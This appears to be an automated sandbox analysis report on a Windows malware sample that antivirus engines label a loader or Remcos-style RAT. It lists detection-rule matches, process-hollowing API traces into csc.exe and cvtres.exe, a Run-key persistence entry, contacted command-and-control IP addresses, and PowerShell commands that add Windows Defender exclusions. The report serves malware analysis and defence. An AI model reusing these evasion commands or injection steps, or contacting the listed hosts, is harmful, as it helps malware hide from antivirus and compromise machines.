privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description task schedule rule schtasks_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Disable AntiVirus rule disable_antivirus
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
cmdline powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
cmdline powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
cmdline C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
cmdline cmd /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
cmdline "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
cmdline "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
cmdline cmd /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
buffer Buffer with sha1: a394998937c4bd60e19d2aad76489978a5059d05
host 185.196.220.62
host 193.142.146.64
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 532480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00350000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000b8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000022c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater reg_value C:\Users\test22\Music\OcoulsUpdater\EyesUpdater.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: 5
base_address: 0xfffde008
process_identifier: 2188
process_handle: 0x000000b8
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELXú©à" 0àvù @ @`…"ùOt  €ø8  H.textÞ à `.rsrctâ@@.reloc è@B
base_address: 0x00400000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€tää4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°DStringFileInfo 000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.10InternalNameDLL.exeHLegalCopyrightCopyright © 2021*LegalTrademarks8OriginalFilenameDLL.exe"ProductName4ProductVersion1.0.0.18Assembly Version1.0.0.1„ê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00420000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer: ð x9
base_address: 0x00422000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2280
process_handle: 0x0000022c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELXú©à" 0àvù @ @`…"ùOt  €ø8  H.textÞ à `.rsrctâ@@.reloc è@B
base_address: 0x00400000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0
Process injection Process 660 called NtSetContextThread to modify thread in remote process 2188
Process injection Process 2188 called NtSetContextThread to modify thread in remote process 2280
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 3984590
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000b4
process_identifier: 2188
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4323702
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000230
process_identifier: 2280
1 0 0
Process injection Process 2188 resumed a thread in remote process 2280
Process injection Process 2416 resumed a thread in remote process 2548
Process injection Process 2456 resumed a thread in remote process 2620
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2280
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2620
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2248
thread_handle: 0x00000224
process_identifier: 2244
current_directory:
filepath: C:\Windows\explorer.exe
track: 1
command_line:
filepath_r: C:\Windows\explorer.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000228
1 1 0
option -noninteractive value Prevents creating an interactive prompt for the user
option -noninteractive value Prevents creating an interactive prompt for the user
option -noninteractive value Prevents creating an interactive prompt for the user
option -noninteractive value Prevents creating an interactive prompt for the user
option -noninteractive value Prevents creating an interactive prompt for the user
option -noninteractive value Prevents creating an interactive prompt for the user
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2192
thread_handle: 0x000000b4
process_identifier: 2188
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
stack_pivoted: 0
creation_flags: 2 (DEBUG_ONLY_THIS_PROCESS)
inherit_handles: 0
process_handle: 0x000000b8
1 1 0

NtGetContextThread

 thread_handle: 0x000000b4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 532480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00350000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000b8
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00350000
process_identifier: 2188
process_handle: 0x000000b8
1 1 0

WriteProcessMemory

 buffer: 5
base_address: 0xfffde008
process_identifier: 2188
process_handle: 0x000000b8
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 3984590
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000b4
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2188
1 0 0

CreateProcessInternalW

 thread_identifier: 2248
thread_handle: 0x00000224
process_identifier: 2244
current_directory:
filepath: C:\Windows\explorer.exe
track: 1
command_line:
filepath_r: C:\Windows\explorer.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000228
1 1 0

CreateProcessInternalW

 thread_identifier: 2284
thread_handle: 0x00000230
process_identifier: 2280
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000022c
1 1 0

NtGetContextThread

 thread_handle: 0x00000230
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000022c
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELXú©à" 0àvù @ @`…"ùOt  €ø8  H.textÞ à `.rsrctâ@@.reloc è@B
base_address: 0x00400000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€tää4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°DStringFileInfo 000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.10InternalNameDLL.exeHLegalCopyrightCopyright © 2021*LegalTrademarks8OriginalFilenameDLL.exe"ProductName4ProductVersion1.0.0.18Assembly Version1.0.0.1„ê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00420000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer: ð x9
base_address: 0x00422000
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2280
process_handle: 0x0000022c
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4323702
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000230
process_identifier: 2280
1 0 0

NtResumeThread

 thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2280
1 0 0

CreateProcessInternalW

 thread_identifier: 2752
thread_handle: 0x00000000000002b0
process_identifier: 2748
current_directory:
filepath: C:\Windows\System32\ctfmon.exe
track: 1
command_line: ctfmon.exe
filepath_r: C:\Windows\system32\ctfmon.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000000000002b4
1 1 0

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2280
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2280
1 0 0

NtResumeThread

 thread_handle: 0x000001c0
suspend_count: 1
process_identifier: 2280
1 0 0

CreateProcessInternalW

 thread_identifier: 2420
thread_handle: 0x000003c8
process_identifier: 2416
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d0
1 1 0

CreateProcessInternalW

 thread_identifier: 2460
thread_handle: 0x00000380
process_identifier: 2456
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003bc
1 1 0

CreateProcessInternalW

 thread_identifier: 2552
thread_handle: 0x00000084
process_identifier: 2548
current_directory:
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 525824 (CREATE_NEW_PROCESS_GROUP|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2548
1 0 0

CreateProcessInternalW

 thread_identifier: 2624
thread_handle: 0x00000084
process_identifier: 2620
current_directory:
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 525824 (CREATE_NEW_PROCESS_GROUP|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2620
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000450
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x000004b0
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x000002b0
suspend_count: 1
process_identifier: 2620
1 0 0

NtResumeThread

 thread_handle: 0x00000304
suspend_count: 1
process_identifier: 2620
1 0 0

NtResumeThread

 thread_handle: 0x00000454
suspend_count: 1
process_identifier: 2620
1 0 0

NtResumeThread

 thread_handle: 0x000004b4
suspend_count: 1
process_identifier: 2620
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000b4
suspend_count: 1
process_identifier: 2748
1 0 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Loader.4!c
tehtris Generic.Malware
Cynet Malicious (score: 99)
Skyhigh BehavesLike.Win32.ObfuscatedPoly.wh
McAfee Artemis!65A683124FC4
Cylance Unsafe
VIPRE Gen:Variant.Ser.Midie.2644
BitDefender Gen:Variant.Ser.Midie.2644
Arcabit Trojan.Ser.Midie.DA54
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Win32/GenKryptik.HCAH
Avast Win32:RATX-gen [Trj]
Kaspersky Trojan.Win32.Loader.lvq
Alibaba Trojan:Win32/GenKryptik.b7847d30
NANO-Antivirus Virus.Win32.Gen.ccmw
MicroWorld-eScan Gen:Variant.Ser.Midie.2644
Rising Trojan.Injector!1.FCCE (CLASSIC)
Emsisoft Gen:Variant.Ser.Midie.2644 (B)
F-Secure Trojan.TR/Kryptik.yyfda
Zillya Backdoor.Remcos.Win32.7824
McAfeeD ti!3FF0D50557B5
CTX exe.unknown.midie
Sophos Mal/Generic-S
FireEye Generic.mg.65a683124fc4ca18
Webroot W32.Trojan.Gen
Google Detected
Avira TR/Kryptik.yyfda
Kingsoft Win32.Trojan.Loader.lvq
Gridinsoft Malware.Win32.Gen.tr
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm Trojan.Win32.Loader.lvq
GData Gen:Variant.Ser.Midie.2644
AhnLab-V3 Trojan/Win.Generic.R670029
DeepInstinct MALICIOUS
Malwarebytes Trojan.Loader.Generic
Ikarus Win32.Outbreak
TrendMicro-HouseCall TROJ_GEN.R014H09J524
Tencent Win32.Trojan.Genkryptik.Sgil
Fortinet W32/GenKryptik.HCAH!tr
AVG Win32:RATX-gen [Trj]
Paloalto generic.ml
alibabacloud Backdoor:Win/Remcos.gyf
dead_host 192.168.56.103:49193
dead_host 192.168.56.103:49181
dead_host 192.168.56.103:49190
dead_host 192.168.56.103:49212
dead_host 192.168.56.103:49217
dead_host 193.142.146.64:8880
dead_host 192.168.56.103:49177
dead_host 192.168.56.103:49208
dead_host 192.168.56.103:49201
dead_host 192.168.56.103:49191
dead_host 192.168.56.103:49213
dead_host 192.168.56.103:49182
dead_host 192.168.56.103:49187
dead_host 192.168.56.103:49209
dead_host 192.168.56.103:49218
dead_host 192.168.56.103:49178
dead_host 192.168.56.103:49199
dead_host 192.168.56.103:49202
dead_host 192.168.56.103:49195
dead_host 192.168.56.103:49183
dead_host 192.168.56.103:49184
dead_host 192.168.56.103:49214
dead_host 192.168.56.103:49219
dead_host 192.168.56.103:49172
dead_host 192.168.56.103:49207
dead_host 192.168.56.103:49205
dead_host 192.168.56.103:49179
dead_host 192.168.56.103:49210
dead_host 192.168.56.103:49189
dead_host 192.168.56.103:49203
dead_host 192.168.56.103:49220
dead_host 192.168.56.103:49180
dead_host 192.168.56.103:49185
dead_host 192.168.56.103:49215
dead_host 192.168.56.103:49216
dead_host 192.168.56.103:49204
dead_host 192.168.56.103:49197
dead_host 192.168.56.103:49211
dead_host 192.168.56.103:49200
dead_host 192.168.56.103:49221